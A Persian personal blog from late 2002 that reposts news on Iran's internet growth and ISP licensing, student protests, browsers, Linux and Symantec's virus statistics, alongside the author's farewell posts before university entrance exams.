در برخی از اين شبه راديوها بيش از ده ها نفر جمع می شوند و در مورد مسايل مورد علاقه خود بحث می کنند و ميهمان دعوت می کنند و به صحبت های او گوش می دهند.

اين شبه راديوها يک ويژگی منحصر به فرد دارند و آن اينکه ارتباط در آنها کاملا زنده و متقابل است.

آينده اينترنت در ايران

اينترنت تنها چند سال پس از ورود به ايران به سرعت توسعه يافته و اکنون حتی در شهرستان های دور افتاده نيز مردم به اين شبکه جهانی دسترسی دارند.

تعداد کاربران اينترنتی در حالی به طور شتابان در حال افزايش است که تيراژ بزرگترين روزنامه های ايران به طور متوسط بيش از 200 تا 250 هزار نسخه در روز نيست (تنها چند روزنامه در سال های اخير تيراژی بالاتراز اين داشته اند).

در نتيجه به نظر می رسد اينترنت رفته رفته جايگاه خود را در ايران پيدا می کند
+ احسان شیطون ; ٧:٥٤ ‎ق.ظ ; شنبه ٩ آذر ،۱۳۸۱
comment نظرات ()

 

تعداد کافی نت ها و مراکز ارائه خدمات اينترنتی در ايران روبه افزايش است

در حالی كه وزارت پست و تلگراف و تلفن ايران به شركت‌ های فعال اطلاع‌ رسانی هشدار داده كه برای دريافت مجوز اقدام كنند و در صورت عدم دريافت مجوز، با آنها برخورد قانونی خواهد شد، انجمن صنفی كارفرمايان شبكه‌ های اينترنتی اعلام كرده است كه تاكنون ضابطه مشخصی برای فعاليت شبكه‌ های اطلاع رسانی خصوصی ارائه نشده است.

روابط‌ عمومی وزارت پست وتلگراف وتلفن با صدور اطلاعيه ‌ای اعلام كرده است كه بر اساس مصوبه شورای عالی ‌انقلاب فرهنگی و مواد قانونی برنامه سوم زمينه و امكانات فعاليت بخش خصوصی در امور مرتبط به شبكه ‌های اطلاع‌ رسانی به ويژه اينترنت در موسسات خدمات دسترسی به شبكه اطلاع‌ رسانی جهانی فراهم شده است.

در اين اطلاعيه از تمام وزارتخانه ‌ها، سازمانها و شركت‌ های دولتی و غيردولتی كه فعاليت مشابه انجام می ‌دهند، خواسته شده است مجوز رسمی دريافت كنند و در غير اين صورت با آنها برخورد قانونی صورت خواهد گرفت.


سال گذشته تعدادی از كافی ‌نت ها بسته ‌شدند و گفته شد كه اين كافی ‌نت ‌ها مجوز نداشته ‌اند، اما تعطيلی اين كافی ‌نت ‌ها دوام نياورد و با واكنش شركت‌ ها و مقامات به ‌خصوص نمايندگان مجلس بازگشايی شدند
مصطفی محمدی دبير انجمن كارفرمايان شبكه ‌های اينترنتی به خبرگزاری دانشجويان ايران، گفته است: نه تنها بخش خصوصی كه بخش دولتی نيز ضوابط قانونی مدون و رسمی از سوی وزارت پست و تلگراف وتلفن دريافت نكرده‌ اند تا به آن توجه داشته باشند.

اطلاعيه وزارت پست و تلگراف و تلفن از شكل‌ گيری "شورای نظارت بر فعاليت ‌های ارتباط و فن‌ آوری اطلاعات" در آن وزارتخانه خبر داده و نوشته است كه اين شورا فعاليت ‌های غيرقانونی را پيگيری خواهد كرد.

سال گذشته تعدادی از كافی ‌نت ها بسته ‌شدند و گفته شد كه اين كافی ‌نت ‌ها مجوز نداشته ‌اند، اما تعطيلی اين كافی ‌نت ‌ها دوام نياورد و با واكنش شركت‌ ها و مقامات به ‌خصوص نمايندگان مجلس بازگشايی شدند.

شورای عالی انقلاب فرهنگی اواخر پاييز سال گذشته ايجاد نقطه تماس بين‌ المللی ‌(آی. اس. پی) را در انحصار دولت قرار داد.

در مصوبه شورای عالی انقلاب فرهنگی آمده است: شركت‌ های ارائه دهنده خدمات "آی. اس. پی"ها دارای مسئوليت قانونی نسبت به ارائه اطلاعات در شبكه بوده و بايد از نشر مطالب الحادی(كفرآميز) و مخالف موازين اسلامی، ‌اهانت به دين اسلام و مقدسات آن، ‌اشاعه و تبليغ گروه‌ ها و احزاب غيرقانونی جلوگيری كنند.

اكنون شركت ‌های ارائه دهنده خدمات اينترنتی بيش از همه از محتوای مطالب ارائه شده به ‌وسيله كاربران نگران هستند. آنها می ‌گويند شركت مخابرات مجوز صادر می ‌كند اما مهم مسائل حقوقی است كه بايد حل شود.

بسياری از مقامات، شركت‌ها و نهادهای صنفی به مصوبه شورای عالی انقلاب فرهنگی واكنش نشان دادند و اعلام كردند كه اين شورا حق قانون‌ گذاری ندارد.

با وجود اين،‌ گفته می ‌شود تاكنون بيش از 250 مجوز برای تاسيس شركت ‌های خدمات اطلاع‌ رسانی صادر شده است
+ احسان شیطون ; ٧:٥٢ ‎ق.ظ ; شنبه ٩ آذر ،۱۳۸۱
comment نظرات ()

 

اکونوميست نوشته است که اعتراضهای دانشجويی در آينده گسترش نخواهد يافت

هفته نامه بريتانيايی اکونوميست در شماره اين هفته خود مقاله ای با عنوان انقلاب عليه انقلاب به چاپ رسانده است که در آن با نگاهی به تظاهرات دانشجويان ايران تحليلی از تحولات سياسی جاری در ايران ارائه داده است.

از نگاه اين هفته نامه تازه ترين رويارويی ميان اصلاح طلبان و محافظه کاران در ايران نشان داده است که محافظه کاران افراطی وضعيت ناپايدارتری نسبت به گذشته يافته اند.

در 26 نوامبر چهارتن از رهبران اصلی تظاهرات دانشجويی ماه اخير در ايران به حکم دادگاه انقلاب دستگير شدند اما روز بعد شورای عالی امنيت ملی دستور آزادی آنان را صادر کرد.


به نوشته اکونوميست فعالان جنبش دانشجويی با درک اينکه پليس ديگر در مقابل گروههای محافظه کار افراطی از آنان محافظت نخواهد کرد به تظاهرات خود پايان داده اند
اکونوميست نوشته است که برخی از اصلاح طلبان در اين ماجرا نشانه هايی از شکاف ميان مخالفانشان می بينند.

اکونوميست در پرونده ای که عليه هاشم آغاجری روشنفکر ايرانی تشکيل شده است نيز نشانه ای از اختلاف آشکار ميان آيت الله خامنه ای رهبر ايران و عبدالنبی نمازی دادستان کل کشور يافته و نوشته است با وجود اينکه که آيت الله خامنه ای دستور تجديدنظر در پرونده آقای آغاجری صادر کرده آقای نمازی حاضر نشده است به عنوان دادستان کل کشور خواستار تجديد نظر در حکم اعدامی شود که برای آقای آغاجری صادر شده و گفته است که آقای آغاجری بايد خودش درخواست تجديدنظر کند.

نويسنده مقاله انقلاب عليه انقلاب معتقد است که مداخله آيت الله خامنه ای، محمد خاتمی رئيس جمهور ايران را ناچار کرده است دست از حمايت از دانشجويان بردارد و فعالان جنبش دانشجويی نيز با درک اينکه پليس ديگر در مقابل گروههای محافظه کار افراطی از آنان محافظت نخواهد کرد به تظاهرات خود پايان داده اند.


اکونوميست در پرونده آغاجری نشانه ای از اختلاف آشکار ميان رهبر ايران و دادستان کل کشور يافته است
در اين مقاله همچنين به دو لايحه ای پرداخته شده که آقای خاتمی برای افزايش اختيارات خود به مجلس شورای اسلامی فرستاده است و احتمال می رود مورد مخالفت شورای نگهبان قرارگيرد.

در صورت رد اين لايحه ها از سوی شورای نگهبان رئيس جمهور می تواند آنها را به همه پرسی بگذارد اما برای برگزاری همه پرسی به موافقت رهبر نياز است و عدم موافقت رهبر می تواند او را رودررو با آقای خاتمی قرار دهد.

اما اکونوميست با ارائه دلايلی بروز چنين رودرروئی را بعيد دانسته است.

مقاله انقلاب عليه انقلاب در پايان نتيجه می گيرد که اعتراضهای دانشجويی در آينده گسترش نخواهد يافت و به ساير اقشار جامعه سرايت نخواهد کرد چون "بيشتر مردم ايران هر قدر هم که از وضع موجود ناراضی باشند سعی می کنند خود را از خط مقدم جبهه مبارزه و اعتراض دور نگه دارند."
+ احسان شیطون ; ٧:٥٠ ‎ق.ظ ; شنبه ٩ آذر ،۱۳۸۱
comment نظرات ()

 

اقايون و خانومها به جون مادرم بر ميگردم به خدا برميگردم شيما ومونا علوی شپيده وسارا وسمانه و الهام و ارزو و فرشته و تمام کسانی که ميل های به قشنگی برای من فرستاديد واقايون عزيز امير و علی و محمد و بابک و شهرداد و ..... از شما هم برای ميل ها تون تشکر ميکنم و اقای مريخی و نيمه پنهان و پسر ايرونی عزيز ساناز خانوم هر جفت نما ها و شايان
خان از شما هم برای نظر داديد ممنونم به خدا باور کنيد توی اين هفته من سومين باريه که ميلهايم رو خالی ميکنم باز هم از همتون ممنونم
+ احسان شیطون ; ٤:٥٥ ‎ب.ظ ; پنجشنبه ٧ آذر ،۱۳۸۱
comment نظرات ()

 

بچه ها سلام امروز اومدم از همه شما ها حلاليت بطلبم و برم اره من يعنی همون احسان اومدم از شما دوستان عزيزم خداحافظی بکنم از علی هکر از اسپيدر هکر از نيما وی سی از شيما از مونا که خيلی با نظراتش بهم کمک کرد از ناز بانو از پيشی از عمو حميد عزيز و .....
ميخواستم خداحافظی کنم من می خواهم برم بشينم که کنکور رو قبول بشم برام دعا کنيد
بتوانم بازم بيام و وبلاگ بنويسم راستی از دوستان تهرانی که از وبلاگ من ديدن ميکردن :من
يه سری اکانت اينترنت دارم هر کسی لازم داشت ميل بزنه بهش ميدهم راستی تا يادم نرفته
ميخواستم از دوست عزيزم فرشاد جان تشکر و خداحافظی کنم ....
اره عزيزان پس برام دعا کنيد
+ احسان شیطون ; ٩:٢٥ ‎ب.ظ ; یکشنبه ۳ آذر ،۱۳۸۱
comment نظرات ()

 

بيل گيتس صاحب كمپاني مايكروسافت در جمع مهندسان هندي تاكيد كرد كه در بحث شبكه هاي رايانه اي وي لينوكس را رقيبي سرسخت براي خود نمي شمارد و مطمئن است كه با پروژه (دات نت ) .NET مي تواند امنيت خاطري براي راهبران شبكه هاي بزگر و كوچك ايجاد كند.
ثروتمندترين مرد جهان در سومين روز سفر خود به هند ضمن بازديد از پروژه بزرگ خود در بنگلور تاكيد كرد كه كمپاني مطبوعش سرمايه اي معادل 5 ميليارد دلار را به .NET اختصاص داده و با راه اندازي فارهاي مختلف سعي دارد رقيب اصلي خود لينوكس را از ميدان بدر كند.

مرجع : جام جم آنلاين
+ احسان شیطون ; ٧:٢۱ ‎ب.ظ ; جمعه ۱ آذر ،۱۳۸۱
comment نظرات ()

 

با توزيع نسخه جديدی از "نت اسکيپ" انتظار می رود موقعيت برتر "اينترنت اکسپلورر" که در حال حاضر مرورگر استاندارد اينترنت است، به چالش گرفته شود.

اين نرم افزار از ماه مه تاکنون مورد آزمايش بوده است و ادعا می کند مرور اينترنت با آن سريع تر و آسان تر است.

"نت اسکيپ" با وجود پيشرفت های فنی، در سال های اخير ميدان رقابت را به "اينترنت اکسپلورر" از شرکت مايکروسافت واگذار کرده است.

در حال حاضر مايکروسافت 96 درصد بازار مرورگروها را در اختيار دارد، درحالی که اوايل دهه 1990 نت اسکيپ بر بازار غالب بود.

"نت اسکيپ زنده است"

آخرين نسخت نت اسکيپ به نام "نت اسکيپ 7" را غول رسانه ای "ای او ال تايم وارنر" که در سال 1998 شرکت نت اسکيپ را خريد، توليد کرده است.

مارتی گوردون" سخنگوی نت اسکيپ گفت: "ما سرگرم امتحان مرورگر بوده ايم و اين نرم افزار در حال قدرت گرفتن است. احساس می کنيم باد در بادبان ماست. نت اسکيپ سالم و سرحال است."

نرم افزار جديد براساس "نت اسکيپ گکو" (Netscape Gecko) ساخته شده است. "نت اسکيپ گکو" تعيين می کند چگونه يک صفحه وب روی صفحه کامپيوتر ظاهر شود و از استانداردهای اينترنتی مانند "اچ تی ام ال"، "اکس ام ال"، "کسکيدينگ استايل شيتز" و "جاوا اسکريپت" پشتيبانی می کند.

نبرد برای تصاحب بازار

نت اسکيپ در اوايل دهه 1990 بر بازار مرورگرها غالب بود، اما پس از تهاجم بی رحمانه مايکروسافت با "اينترنت اکسپلورر"، ميدان رقابت را واگذار کرد.

نت اسکيپ نبرد دشواری را برای بازپس گرفتن بازار از اکسپلورر پيش رو دارد.

البته مدتی قبل مايکروسافت به اتهام استفاده از شيوه های انحصارگرايانه و غيرقانونی برای بيرون راندن نت اسکيپ از ميدان، به دادگاه فراخوانده شد.

از آن جا که اکسپلورر بر بازار غلبه دارد، طراحان وب سايت معمولا صفحات خود را براساس اين مرورگر تنظيم می کنند. نتيجه اين که ساير مرورگرها گاهی صفحات را به درستی نشان نمی دهد.

البته احتمال دارد شرکت "ای او ال" (America Online) خود به کمک نت اسکيپ بشتابد.

احتمال دارد که اين شرکت که هم اکنون خدمات اينترنتی خود را روی اکسپلورر عرضه می کند آن را کنار گذاشته و نت اسکيپ را جايگزين کند، که در آن صورت نت اسکيپ در اختيار ده ها ميليون نفر از مشتريان "ای او ال" قرار خواهد گرفت.

برگرفته از BBC Persian
+ احسان شیطون ; ٧:٢٠ ‎ب.ظ ; جمعه ۱ آذر ،۱۳۸۱
comment نظرات ()

 

قرارداد مديريت و اجراي پروژه فارسي سازي محيط لينوكس به عنوان سيستم عامل ملي، بين مركز فناوري اطلاعات و ارتباطات پيشرفته شريف و شوراي عالي انفورماتيك منعقد شد.
به گزارش خبرنگار گروه كامپيوتر "آسيا" اين قرارداد در راستاي معرفي طرح ملي فارسي ساز محيط Linux تهيه شده كه انجام كارهاي آن با همكاري متخصصان داخلي و خارجي صورت مي گيرد. گـفتنـي اسـت اطــلاعــات مربـوط به ايـن پـروژه در آدرس www.Linux.aictc.com قـرار داده شـده و امكان استفاده رايــگــان از نــرم افــزارهـــايـــي مــثـل حفاظ هـاي SMS,nonestatefull,Statefull و نشر روميزي Koffice در آن فراهم شده است.

برگرفته از Asia-Economic
+ احسان شیطون ; ٧:۱٩ ‎ب.ظ ; جمعه ۱ آذر ،۱۳۸۱
comment نظرات ()

 

کارشناسان علوم انفورماتيک هشدار می دهند که ميزان خرابکاری و ارتکاب جرم در اينترنت به سرعت رو به افزايش است و عوامل اين خرابکاری ها به شيوه ها و فنون تازه ای دست می يابند.

شمار حملات ويروسی در اينترنت به قدری افزايش يافته است که شرکت ها و کاربران عادی فرصت نمی کنند به تهديدهای تازه واکنش نشان داده و برای رفع نقاط ضعف سيستم خود اقدام کنند.

در اين ميان شرکت های امنيتی، درگير رقابت تنگاتنگی با ويروس نويس ها و خرابکاران هستند و برنده اين رقابت کسی است که زودتر بتواند به خبر وجود نقاط ضعف در يک سيستم مشخص، واکنش نشان دهد.

در همين حال، فنونی که خرابکاران برای توليد و تکثير ويروس های تازه از آن استفاده می کنند پيشرفته تر می شود.

داده های خطرناک

آمارهای جمع آوری شده از سوی شرکت امنيتی "سيمانتک" (Symantec) نشان می دهد که حملات اينترنتی سالانه 64 درصد افزايش پيدا می کند.

در شش ماه نخست سال 2002، شرکت هايی که به اينترنت متصل بودند به طور متوسط هفته ای 32 بار هدف حمله قرار گرفتند درحالی که اين رقم در شش ماه نخست سال 2001 به هفته ای 25 مورد محدود می شد.

به گفته "آميت يوران" رئيس بخش خدمات امنيتی سيمانتک شرکت هايی مانند سيمانتک هر ماه از وجود 400 تا 500 ويروس جديد و حدود 250 نقطه ضعف در برنامه های رايانه ای باخبر می شوند.

آمارها همچنين نشان می دهد که برخورد مجرمان اينترنتی با همه شرکت های بازرگانی يکسان نيست.

آقای يوران گفت: "به نظر می رسد شرکت های توليد نيرو و انرژی و در درجه بعد شرکت های خدمات مالی بيش از ساير بخش ها هدف حمله قرار می گيرند."

شرکت های عمومی نيز در مقايسه با شرکت های خصوصی يا آژانس های دولتی بيشتر هدف قرار می گيرند.

آقای يوران می گويد صرفنظر از اين که چه کسی هدف حمله است، مهلت لازم برای نشان دادن واکنش يا پوشاندن ضعف های امنيتی رو به کاهش است.

او گفت: "کارآيی فنون تکثير ويروس در اينترنت به طور منظم افزايش می يابد، به اين ترتيب از مهلت ايجاد و به کار گرفتن سپرهای امنيتی کاسته می شود."

ضعف هايی که ويروس هايی مانند "نيمدا" (Nimda) و "کد قرمز" (Code Red) برای حمله به رايانه ها از آن سواستفاده کردند ماه ها پيش از انتشار اين ويروس ها شناخته شده بود.

به اين ترتيب در گذشته فاصله ميان آگاهی عموم از وجود يک نقطه ضعف نرم افزاری و شيوع ويروس هايی که از آن بهره برداری می کردند دست کم به چند ماه می رسيد.

اما امروزه اين فاصله کوتاه شده است و به عنوان مثال ويروس "اسلپر" (Slapper) تقريبا يک ماه پس از فاش شدن ضعفی که اين ويروس از آن سوء استفاده می کند منتشر شد.

بازی خطرناک

سيمانتک مانند بسياری ديگر از شرکت های امنيتی از شبکه های داخلی و خارجی شرکت هايی که هدف حمله هستند دفاع می کند و نقاط ضعفی را که ممکن است مورد سوء استفاده قرار گيرد کشف می کند.

آقای يوران می گويد رشد چشمگير تهديدهای امنيتی رايانه ای، باعث شده است شرکت ها نتوانند به تنهايی از سيستم های خود مراقبت کنند و مجبور می شوند از شرکت های تخصصی مانند سيمانتک کمک بگيرند.

به گفته وی بسياری از ويروس های پست الکترونيکی ويندوز را که به صندوق های پستی رايانه ها حمله می کنند، نوجوان هايی می نويسند که انگيزه ای جز سرگرمی و ارضای غرور خود ندارند.

به گفته او احتمالا به همين دليل است که ويروس ها معمولا اطلاعات مهم را نابود يا سرقت نمی کنند.

اما او می گويد خودداری خرابکاران از نوشتن چنين ويروس هايی هميشگی نخواهد بود.

مرجع BBC Persian
+ احسان شیطون ; ٧:۱۸ ‎ب.ظ ; جمعه ۱ آذر ،۱۳۸۱
comment نظرات ()

 

روزنامه « آساهی شيمبون » گزارش داد كه دولت ژاپن براى امنيت رايانه هاى خود به دنبال جايگزينى براى سيستم عامل ويندوز است.

اغلب سرورها و رايانه‌هاى دولت ژاپن از نرم افزار ويندوز كه شركت آمريكايى مايكروسافت آن را طراحى كرده، استفاده مى كنند. اما آساهى به نقل از منابع دولتى گفت كه توكيو علاقمند به استفاده از سيستم‌هاى عامل ديگر، بويژه برنامه‌هاى open-source همچون لينوكس است.

استفاده از اين برنامه‌ها نيازى به پرداخت حق پروانه ندارد و چون كدهاى منبع آنها مجاني در دسترس قرار مى گيرند، براحتى قابل اصلاح و تقويت هستند. آساهى گفت كه وزارت زمين، زير ساخت و ترابرى ژاپن مامور تشكيل هيأتى از كارشناسان براى بررسى اين مهم شده است.

كميته «دولت الكترونيك» در حزب حاكم ليبرال دمكرات در ماه اوت گذشته از دولت خواسته بود كه به دلايل امنيتى براى ساخت يا به كارگيرى يك برنامه open-source در رايانه‌هاى دولتى اقدام كند
+ احسان شیطون ; ٧:۱٧ ‎ب.ظ ; جمعه ۱ آذر ،۱۳۸۱
comment نظرات ()